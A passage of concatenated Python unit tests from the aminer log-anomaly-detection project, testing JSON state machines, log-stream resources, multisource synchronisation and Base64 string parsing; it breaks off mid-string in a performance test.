'World']} state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) # single line with spaces value = b'"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}' state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) # multiline with tabs value = b'\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \ b'\n\t\t"Hello",\n\t\t"World"]}' state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) def test27object_machine_invalid_values(self): """Test the object_machine with invalid values.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Invalid returned as valid.") # keys without " value = b'"string":"Hello World",integer:22,"float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b'integer') + 1]: state = state(c) self.assertIsNone(state) # = instead of : value = b'"string":"Hello World","integer"=22,"float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b'=') + 1]: state = state(c) self.assertIsNone(state) # no comma after attribute. The error is only found after the next :. However this behavior is not problematic, because another # attribute or the end bracket } has to follow. value = b'"string":"Hello World","integer":22 "float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b':22.') + 1]: state = state(c) self.assertIsNone(state) def test28object_machine_started_from_json_machine(self): """Test if the object_machine is started from the json_machine.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, compare_value) # single line, no spaces value = b'{"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}' compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') # single line with spaces value = b'{"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') # multiline with tabs value = b'{\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \ b'\n\t\t"Hello",\n\t\t"World"]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b"""{"HistogramData": {"Bins": {"...-0]": 0, "[0-1]": 0, "[1-2]": 0, "[2-3]": 0, "[3-...]": 0\n}, "BinNames": ["...-0]", "[0-1]", "[1-2]", "[2-3]", "[3-...]"]}}""" compare_value = {"HistogramData": {"Bins": {'...-0]': 0, '[0-1]': 0, '[1-2]': 0, '[2-3]': 0, '[3-...]': 0}, "BinNames": [ '...-0]', '[0-1]', '[1-2]', '[2-3]', '[3-...]']}} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') def test29json_machine_only_allow_objects_at_start(self): """The json_machine must only allow objects at the start.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Invalid returned as valid.") forbidden_values = [0x22, 0x2b, 0x2d, 0x31, 0x5b, 0x74, 0x66, 0x6e] for value in forbidden_values: state = json_machine(raise_error) self.assertIsNone(state(value)) state = json_machine(raise_error) self.assertIsNotNone(state(ord('{'))) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/LogStreamTest.py000066400000000000000000000162121437606560100262340ustar00rootroot00000000000000import unittest from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource, LogStream import os import base64 import socket import hashlib # skipcq: BAN-B404 import subprocess from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from unit.TestBase import TestBase class LogStreamTest(TestBase): """Unittests for the LogStream.""" logfile = b'/tmp/log.txt' file = b'file://' def setUp(self): """Set up the logfile.""" super().setUp() with open(self.logfile, "w+") as f: for i in range(150): f.write("%d %s\r\n" % (i + 1, "d" * 1000)) def tearDown(self): """Remove the logfile.""" super().tearDown() os.remove(self.logfile) def test1file_log_data_resource_no_file(self): """In this case the log_resource_name does not start with b'file://'.""" self.assertRaises(Exception, FileLogDataResource, b'/var/log/syslog', -1) def test2file_log_data_resource_log_stream_closed_no_repositioning(self): """ In this case the log_stream_fd is -1 and repositioning_data is None. The next step is to open the stream successfully. Afterwards the buffer object is filled with data and the position is updated. """ file_log_data_resource = FileLogDataResource(self.file + self.logfile, -1) file_log_data_resource.open(False) self.assertEqual(file_log_data_resource.buffer, b'') length = file_log_data_resource.fill_buffer() self.assertEqual(length, file_log_data_resource.default_buffer_size) file_log_data_resource.update_position(length) self.assertEqual(file_log_data_resource.buffer, b'') self.assertEqual(file_log_data_resource.total_consumed_length, file_log_data_resource.default_buffer_size) # repeat to see if totalConsumedLength was changed. length = file_log_data_resource.fill_buffer() self.assertEqual(length, file_log_data_resource.default_buffer_size) file_log_data_resource.update_position(length) self.assertEqual(file_log_data_resource.buffer, b'') self.assertEqual(file_log_data_resource.total_consumed_length, 2 * file_log_data_resource.default_buffer_size) file_log_data_resource.close() def test3file_log_data_resource_log_stream_already_open_repositioning(self): """ In this case the logStreamFd is > 0 and repositioningData is not None. The stream should be repositioned to the right position. """ fd = os.open('/tmp/log.txt', os.O_RDONLY) # skipcq: BAN-B108 length = 65536 data = os.read(fd, length) # skipcq: BAN-B324, PTC-W1003 md5 = hashlib.md5() md5.update(data) hash_digest = md5.digest() os.close(fd) fd = os.open('/tmp/log.txt', os.O_RDONLY) # skipcq: BAN-B108 file_log_data_resource = FileLogDataResource(self.file + self.logfile, fd, 65536, [os.fstat(fd).st_ino, length, base64.b64encode(hash_digest)]) file_log_data_resource.fill_buffer() self.assertTrue(not file_log_data_resource.buffer == data) os.close(fd) def test4unix_socket_log_data_resource_no_unix_socket(self): """In this case the log_resource_name does not start with b'unix://'.""" self.assertRaises(Exception, UnixSocketLogDataResource, b'/tmp/log', -1) def test5unix_socket_log_data_resource(self): """ In this case the log_stream_fd is -1. The next step is to open the stream successfully. Therefor a server socket is set up listen to data to the server. Afterwards the buffer object is filled with data and the position is updated. """ sockName = b'/tmp/test5unixSocket.sock' # skipcq: BAN-B607, BAN-B603 proc = subprocess.Popen(['python3', 'unit/input/client.py']) if os.path.exists(sockName): os.remove(sockName) print("Opening socket...") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sockName) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix://' + sockName, connection.fileno()) print("Listening...") unix_socket_log_data_resource.fill_buffer() self.assertEqual(repr(unix_socket_log_data_resource.buffer), repr(b'data')) print('Data received: %s' % unix_socket_log_data_resource.buffer.decode()) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 4) self.assertEqual(unix_socket_log_data_resource.buffer, b'') print("Shutting down...") unix_socket_log_data_resource.close() server.close() proc.terminate() proc.wait() print("Done") def test6_log_stream_handle_streams(self): """ This unit case verifies the functionality of the LogStream class. Different FileLogDataResources are added to the stream. The handling of not existing sources is also tested. """ stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream) any_byte_data_me = AnyByteDataModelElement('a1') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_byte_data_me, [], [stream_printer_event_handler], 300, []) file_log_data_resource = FileLogDataResource(self.file + self.logfile, -1) self.assertEqual(file_log_data_resource.buffer, b'') log_stream = LogStream(file_log_data_resource, byte_stream_line_atomizer) file_log_data_resource.open(False) log_stream.handle_stream() self.assertEqual(file_log_data_resource.total_consumed_length + len(file_log_data_resource.buffer), file_log_data_resource.default_buffer_size) log_stream.handle_stream() self.assertEqual(file_log_data_resource.total_consumed_length + len(file_log_data_resource.buffer), file_log_data_resource.default_buffer_size) fileLogDataResource2 = FileLogDataResource(b'file:///var/log/auth.log', -1) self.assertEqual(fileLogDataResource2.buffer, b'') fileLogDataResource2.open(False) log_stream.add_next_resource(fileLogDataResource2) log_stream.roll_over() log_stream.handle_stream() self.assertTrue(file_log_data_resource.total_consumed_length > 0) self.assertEqual(file_log_data_resource.total_consumed_length, file_log_data_resource.default_buffer_size) self.assertTrue(fileLogDataResource2.total_consumed_length > 0) log_stream.roll_over() fileLogDataResource3 = FileLogDataResource(b'file:///var/log/123example.log', -1) fileLogDataResource3.open(False) log_stream.add_next_resource(fileLogDataResource3) self.assertRaises(OSError, log_stream.roll_over) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/SimpleByteStreamLineAtomizerFactoryTest.py000066400000000000000000000033131437606560100334410ustar00rootroot00000000000000import unittest from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from unit.TestBase import TestBase class SimpleByteStreamLineAtomizerFactoryTest(TestBase): """The SimpleByteStreamLineAtomizerFactory should return a valid ByteStreamLineAtomizer with all parameters of the Factory.""" def test1get_atomizer(self): """Tests the creating of an SimpleByteStreamLineAtomizer with the Factory.""" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [], 'Default', False) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [], 'Default', False) simple_byte_stream_line_atomizer_factory = SimpleByteStreamLineAtomizerFactory(any_byte_data_model_element, [ new_match_path_detector1, new_match_path_detector2], [self.stream_printer_event_handler], None) byte_stream_line_atomizer = simple_byte_stream_line_atomizer_factory.get_atomizer_for_resource(None) self.assertEqual(byte_stream_line_atomizer.atom_handler_list, [new_match_path_detector1, new_match_path_detector2]) self.assertEqual(byte_stream_line_atomizer.event_handler_list, [self.stream_printer_event_handler]) self.assertEqual(byte_stream_line_atomizer.default_timestamp_path_list, []) self.assertEqual(byte_stream_line_atomizer.parsing_model, any_byte_data_model_element) self.assertEqual(byte_stream_line_atomizer.max_line_length, 65536) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/SimpleMultisourceAtomSyncTest.py000066400000000000000000000245501437606560100315060ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from time import time, sleep from unit.TestBase import TestBase from datetime import datetime class SimpleMultisourceAtomSyncTest(TestBase): """Unittests for the SimpleMultisourceAtomSync.""" __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' calculation = b'256 * 2 = 512' datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path = "['match/a1']" def test1sorted_log_atoms(self): """In this test case multiple, SORTED LogAtoms of different sources are received by the class.""" description = "Test1SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1, new_match_path_detector2], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time + 1) # not of the same source, thus must not be accepted. self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) # logAtom1 is handled now, so logAtom2 is accepted. self.reset_output_stream() self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t + 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode())) def test2no_timestamp_log_atom(self): """In this test case a LogAtom with no timestamp is received by the class.""" description = "Test2SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), None, new_match_path_detector1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode())) def test3unsorted_log_atom(self): """In this test case multiple, UNSORTED LogAtoms of different sources are received by the class.""" description = "Test3SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1, new_match_path_detector2], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time) # unsorted, should be accepted self.reset_output_stream() self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t - 1).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description, 1, self.match_path, self.calculation.decode()) + self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector1.__class__.__name__, description + "2", 1, self.match_path, self.calculation.decode())) def test4has_idle_source(self): """In this test case a source becomes idle and expires.""" description = "Test4SimpleMultisourceAtomSync" sync_wait_time = 3 any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector1, description) new_match_path_detector2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector2, description + "2") simple_multisource_atom_sync = SimpleMultisourceAtomSync([new_match_path_detector1], sync_wait_time) t = time() match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector2) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) # log_atom1 is handled now, so new_match_path_detector1 should be deleted after waiting the sync_wait_time. self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp(), None], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time + 1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp(), None], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp() - 1, log_atom1], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, new_match_path_detector1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/__init__.py000066400000000000000000000000001437606560100252220ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/client.py000066400000000000000000000003461437606560100247560ustar00rootroot00000000000000from time import sleep import socket sock_name = '/tmp/test5unixSocket.sock' # skipcq: BAN-B108 sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) client.send(b'data') client.close() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/000077500000000000000000000000001437606560100234275ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/AnyByteDataModelElementTest.py000066400000000000000000000101661437606560100313050ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class AnyByteDataModelElementTest(TestBase): """Unittests for the AnyByteDataModelElement.""" id_ = "any" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklmnopqrstuvwxyz.!?" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, AnyByteDataModelElement, "") # empty element_id self.assertRaises(TypeError, AnyByteDataModelElement, None) # None element_id self.assertRaises(TypeError, AnyByteDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, set()) # empty set element_id is not allowed def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = AnyByteDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/Base64StringModelElementTest.py000066400000000000000000000477031437606560100313620ustar00rootroot00000000000000import unittest from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class Base64StringModelElementTest(TestBase): """Unittests for the Base64StringModelElement.""" id_ = "base64" path = "path" def test1get_match_element_valid_match_string_with_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test2get_match_element_valid_match_string_with_one_byte_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test3get_match_element_valid_match_string_without_padding(self): """Parse matching substring without padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded without the padding character =." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkIHdpdGhvdXQgdGhlIHBhZGRpbmcgY2hhcmFjdGVyID0u" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test4get_match_element_valid_match_string_without_exact_length(self): """Parse matching substring without exact length (divisible by 4) and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results( base64_string, match_element, match_context, self.id_, self.path, base64_string[:-(len(base64_string) % 4)], string[:-2], None) def test5get_match_element_valid_match_string_with_partial_length(self): """Parse matching substring out of the MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" data = base64_string + b"\nContent: Public Key" match_context = DummyMatchContext(data) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, base64_string, string, None) def test6get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" base64_dme = Base64StringModelElement(self.id_) data = b"!Hello World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\x90\x90Hello World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7get_match_element_unicode_exception(self): """Parse a Base64 string which can not be decoded as UTF-8, so it has to be returned base64 encoded.""" # ² encoded with ISO-8859-1 base64_string = b"sg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, base64_string, None) def test8element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, Base64StringModelElement, "") # empty element_id self.assertRaises(TypeError, Base64StringModelElement, None) # None element_id self.assertRaises(TypeError, Base64StringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, set()) # empty set element_id is not allowed def test9get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = Base64StringModelElement(self.id_) data = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test10performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.Base64StringModelElement import Base64StringModelElement times = 100000 """ string100_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand." base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhb" \ b"iBvbmx5IHVuZGVyc3RhbmQu" """ string4096_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code " \ # b"is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a long time " \ # b"ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and " \ # b"this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and " \ # b"so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they " \ # b"want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. " \ # b"This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII " \ # b"text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. " \ # b"Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" " \ # b"or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their " \ # b"original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. " \ # b"ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want " \ # b"your CV however in ASCII format, all this means is they want "plain" text with no formatting such as tabs, bold or " \ # b"underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into " \ # b"their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"" \ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII " \ # b"code is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a " \ # b"long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII " \ # b"character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for " \ # b"use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, " \ # b"all this means is they want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any " \ # b"computer can understand. This is usually so they can easily import the file into their own applications without issues. " \ # b"Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for " \ # b"Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a " \ # b"character such as "a" or "@" or 